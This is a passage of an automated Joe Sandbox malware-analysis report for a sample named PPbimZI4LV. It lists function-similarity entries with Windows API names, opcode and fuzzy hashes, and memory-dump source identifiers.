                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageReleaseScreenSendText
                                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                      • API String ID: 3721556410-2107944366
                                                                      • Opcode ID: c2c051044bb7c7ddb3348d31f55c8e9a75bf2736cbd24ec39817eaf22698c765
                                                                      • Instruction ID: f10674173ccc3d93f0c0e7d61bc5edf46637e2e4e88c9d4e8163d87aa509388a
                                                                      • Opcode Fuzzy Hash: c2c051044bb7c7ddb3348d31f55c8e9a75bf2736cbd24ec39817eaf22698c765
                                                                      • Instruction Fuzzy Hash: 3E617F32A18A5295EB40FF61E8825ED3B60FB44B98F501132DD1DE7BAAEF38E445D340
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                      • String ID: SeDebugPrivilege
                                                                      • API String ID: 2533919879-2896544425
                                                                      • Opcode ID: 4f21c35d0a4ac780837a5a8e5dc6f68c18b89875e417af61e1445dd9dd8e1fe8
                                                                      • Instruction ID: 8fae3e57b5afe333fe6aef2ff1a04d9e49755634cb8bc0d8dc65a1c953e4b112
                                                                      • Opcode Fuzzy Hash: 4f21c35d0a4ac780837a5a8e5dc6f68c18b89875e417af61e1445dd9dd8e1fe8
                                                                      • Instruction Fuzzy Hash: E9514062A0C64286FB14FB25D5923B86B60FF84B85F068831D60DD7AA3EF7CE5459B04
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Window$LongMessageSend$Show
                                                                      • String ID: '
                                                                      • API String ID: 257662517-1997036262
                                                                      • Opcode ID: eb894a93846cd46a5342e3ebb468783be677627f1867a2ee8fe2f5b975b70651
                                                                      • Instruction ID: d4b4bf6261f681b03c0355d3ca2507f48fddb21dbe95eb4529b34c396bbb6010
                                                                      • Opcode Fuzzy Hash: eb894a93846cd46a5342e3ebb468783be677627f1867a2ee8fe2f5b975b70651
                                                                      • Instruction Fuzzy Hash: CB51E232E0C65381F760BB66A456A7D2B50EB85B91F545132CE5FE3792EE3CE842E700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: IconLoad_invalid_parameter_noinfo
                                                                      • String ID: blank$info$question$stop$warning
                                                                      • API String ID: 4060274358-404129466
                                                                      • Opcode ID: a20ad64d4c1f0ff606b53834bd72c3c9b388472799770000db1625183137431d
                                                                      • Instruction ID: 582e850fe2b85ff66de73503202ede3192b3ac6e33d30db6ea0d308773f306e8
                                                                      • Opcode Fuzzy Hash: a20ad64d4c1f0ff606b53834bd72c3c9b388472799770000db1625183137431d
                                                                      • Instruction Fuzzy Hash: D4213C21F0C78389FB54BF55A90217A6355AF547A4F445031EE4DE2397FE7DE442A600
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLoadModuleString$Messagewprintf
                                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                                      • API String ID: 4051287042-3128320259
                                                                      • Opcode ID: f7e86a73b67135bbf4198df281c36ffde702979d794fcff8f2d08bb660d9317c
                                                                      • Instruction ID: 18660ba8504ebddb9d39ea9555f76bfc5125562538a6e528ea48af1f6193165f
                                                                      • Opcode Fuzzy Hash: f7e86a73b67135bbf4198df281c36ffde702979d794fcff8f2d08bb660d9317c
                                                                      • Instruction Fuzzy Hash: D711707161CA8695E764BB20F4467EA6260FB88745F840036EA4EE2B4AEF3CD149DB00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                      • String ID:
                                                                      • API String ID: 1211466189-0
                                                                      • Opcode ID: e4483054fe90d725006c88ea8490581a4df116f0e1f8785d266180591fe398c1
                                                                      • Instruction ID: f76b0533e5cbf576df302782f807e50149a90c240f9f2f5239678ea3a0a93d40
                                                                      • Opcode Fuzzy Hash: e4483054fe90d725006c88ea8490581a4df116f0e1f8785d266180591fe398c1
                                                                      • Instruction Fuzzy Hash: CCA1F33271C69282FB6CBF25D156B7976A0FB44B84F105035DE8AE3A91EF3CE851A700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Close$BuffCharConnectDeleteOpenRegistryUpperValue
                                                                      • String ID:
                                                                      • API String ID: 50796853-0
                                                                      • Opcode ID: f5a1a67ecd9b101a11fc5f9cb9367f83b4f1b47b2c9f0c1f4c44b8d49d3bc558
                                                                      • Instruction ID: c6a7f6a64c92761337b592d3f607a9367b9540a811316dcff9be16c29eada0bc
                                                                      • Opcode Fuzzy Hash: f5a1a67ecd9b101a11fc5f9cb9367f83b4f1b47b2c9f0c1f4c44b8d49d3bc558
                                                                      • Instruction Fuzzy Hash: 2BB13862B0CA4286EB10FFA5D5923BC2760BF85B84F418531DA4EE7A97EF38D109D744
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: ShowWindow
                                                                      • String ID:
                                                                      • API String ID: 1268545403-0
                                                                      • Opcode ID: cc21e6db9a044589e755c4703016b6e1d9c57170080a8525f9bf3d2d7d54c8f4
                                                                      • Instruction ID: 5d4ebde44412e752df546e5e7376938185835f32e1e43885eee377a911e3f586
                                                                      • Opcode Fuzzy Hash: cc21e6db9a044589e755c4703016b6e1d9c57170080a8525f9bf3d2d7d54c8f4
                                                                      • Instruction Fuzzy Hash: 99518331E0C58289FB69BB29A45737D26919F92B4CF384031C51EE66DBEE6CA484F300
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                      • String ID:
                                                                      • API String ID: 3864802216-0
                                                                      • Opcode ID: 51e6ec7aa37fc3003482106919c843e152de56e0f8813b4e66b1a7a4e18ad1cb
                                                                      • Instruction ID: 5e94b997124d290344125c9020c6774e0c53c9ead254dddfa5c627d01975d8d2
                                                                      • Opcode Fuzzy Hash: 51e6ec7aa37fc3003482106919c843e152de56e0f8813b4e66b1a7a4e18ad1cb
                                                                      • Instruction Fuzzy Hash: E741DE3661868187E764EF21B406B6ABBA0F788BD1F104035EF8A93B14EF3CD4448F00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      • Opcode ID: c2757373dfb26c044112a110afa25e05e956175428925470acde8015b00b00d1
                                                                      • Instruction ID: 36f05021c4cb27ab079694a6957b751b13104a441a2c58f249ced69de003d073
                                                                      • Opcode Fuzzy Hash: c2757373dfb26c044112a110afa25e05e956175428925470acde8015b00b00d1
                                                                      • Instruction Fuzzy Hash: D9C13522A0D78296EB61BF11948227D6B61FF40B80F556131DA4EE7397EF3CE481E780
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                      • String ID:
                                                                      • API String ID: 2550207440-0
                                                                      • Opcode ID: 00c2af4dc047eb3328d9db7280bab1605e51150c83bde12361ed7da654b6a987
                                                                      • Instruction ID: 09b193f521b765b7e5d93e662bf688f022bfd09b32bb29088c118972f629a4d0
                                                                      • Opcode Fuzzy Hash: 00c2af4dc047eb3328d9db7280bab1605e51150c83bde12361ed7da654b6a987
                                                                      • Instruction Fuzzy Hash: 96A18D22E1C682A6FB54BB65C5563BC27A0FB44B88F154631DA0DE7792EF7CE444E340
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                      • String ID:
                                                                      • API String ID: 87235514-0
                                                                      • Opcode ID: f9339e9b515e9b8f23d28b48758f4b43b45cdaeeceea552a0e587170ddb5bff8
                                                                      • Instruction ID: bdace4ff171c7c8ed29b0e1caa12c18b2f58a6d9915618d93d66ebcbed5a734f
                                                                      • Opcode Fuzzy Hash: f9339e9b515e9b8f23d28b48758f4b43b45cdaeeceea552a0e587170ddb5bff8
                                                                      • Instruction Fuzzy Hash: 0D51BF12A0D2D19AFB71BB71510267E6F90FF46BC0F498078DA89E7B47DE29E450E320
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                      • String ID:
                                                                      • API String ID: 87235514-0
                                                                      • Opcode ID: e18e0e2c600af16f3ee63314e1511203568865ab3516c571b9de0b17f9c371ff
                                                                      • Instruction ID: 50cbf08d1a63b888cd2302f7a67faaed1cbba4c8d0743bf4a09f56659e79553f
                                                                      • Opcode Fuzzy Hash: e18e0e2c600af16f3ee63314e1511203568865ab3516c571b9de0b17f9c371ff
                                                                      • Instruction Fuzzy Hash: 6651EF13A0C2D19AFB61BB705112A7D2F61FF46BC4F488078DA89D7F47DE28E454A721
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Internet$CloseConnectErrorEventHandleHttpLastOpenRequest
                                                                      • String ID:
                                                                      • API String ID: 3401586794-0
                                                                      • Opcode ID: 253a407ca22485da5ca56320f2061644023828f6bd6f560db9f49e2617228af6
                                                                      • Instruction ID: 7e5f33f7cd7306fe21556bc45afb2ca5d09d0de6f6a698f82c63558bc7facdc1
                                                                      • Opcode Fuzzy Hash: 253a407ca22485da5ca56320f2061644023828f6bd6f560db9f49e2617228af6
                                                                      • Instruction Fuzzy Hash: CA51D436A0C68286F754FF26A8126AE77A0FB44B88F584131DE0DE7B45EF39D455D700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: From$ErrorModeProg$AddressCreateFreeInstanceProcStringTasklstrcmpi
                                                                      • String ID: DllGetClassObject
                                                                      • API String ID: 668425406-1075368562
                                                                      • Opcode ID: 214bc254c47588fde01e5fc27ee3c6930efb076d9c02937a19424ffc77af6643
                                                                      • Instruction ID: 9c17550477bad5cf12f0daa17c84b125e0ad390c02470f6a6172692ce3beef4e
                                                                      • Opcode Fuzzy Hash: 214bc254c47588fde01e5fc27ee3c6930efb076d9c02937a19424ffc77af6643
                                                                      • Instruction Fuzzy Hash: 24513722A1CB86CAFB15FF16E5423696360FF44B84F248134DA49E7B56EF7CE494A700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: LongMessageSendWindow
                                                                      • String ID:
                                                                      • API String ID: 3360111000-0
                                                                      • Opcode ID: 10b92532f4478cd50d58fa8196457338f991273d8d1c085252422c4c1f4f913a
                                                                      • Instruction ID: 70902a8621f46438f85a929f7d2fd64cfd79d0ddcbb0487171036d7d70dc22db
                                                                      • Opcode Fuzzy Hash: 10b92532f4478cd50d58fa8196457338f991273d8d1c085252422c4c1f4f913a
                                                                      • Instruction Fuzzy Hash: 40416C26A0CA5581FA60FF19E9922783760EBC4F90F644136CA5ED3BA6DF3DE481D300
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLastinet_addrsocket
                                                                      • String ID:
                                                                      • API String ID: 4170576061-0
                                                                      • Opcode ID: 6f732a3ceb6dc8ae0713a757b729ef5f32bd0ba729350ec97b60288269ebfabf
                                                                      • Instruction ID: 6e7fac8073eb1df76245aba5699e638bdc66439f5f52f517f2e3b41360243fd5
                                                                      • Opcode Fuzzy Hash: 6f732a3ceb6dc8ae0713a757b729ef5f32bd0ba729350ec97b60288269ebfabf
                                                                      • Instruction Fuzzy Hash: CE41B172A0C68282E760FF26A4862AD7360FB44BA4F404631DE6ED7796EF3CD445D700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                      • String ID:
                                                                      • API String ID: 161812096-0
                                                                      • Opcode ID: 22fcd4b96cb08b999353f17b01c1e421480795c8207f5970277f026457662bef
                                                                      • Instruction ID: 18c115a70f539630ee9493956bf7586f5711e1c409b5ff3089c6f7ccdec4253f
                                                                      • Opcode Fuzzy Hash: 22fcd4b96cb08b999353f17b01c1e421480795c8207f5970277f026457662bef
                                                                      • Instruction Fuzzy Hash: 4E416D36A08B0585EB50EF22D8826AC37B0FB45B98F254135DE4EA776AEF38D845D700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                      • String ID:
                                                                      • API String ID: 395352322-0
                                                                      • Opcode ID: fa94a490bcff5352d4611bed330528fad8175282c266d08f0e682cee49e7ebff
                                                                      • Instruction ID: 4687e9301c7d0d5cc02bbd786b4096a31444f365c5763aa91e0e28024f4e0ee8
                                                                      • Opcode Fuzzy Hash: fa94a490bcff5352d4611bed330528fad8175282c266d08f0e682cee49e7ebff
                                                                      • Instruction Fuzzy Hash: D041AF3260CB8586E760FF11E4563EE63A0FB89784F840131EA8DD6A59EF3DC149DB04
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                      • String ID:
                                                                      • API String ID: 3761583154-0
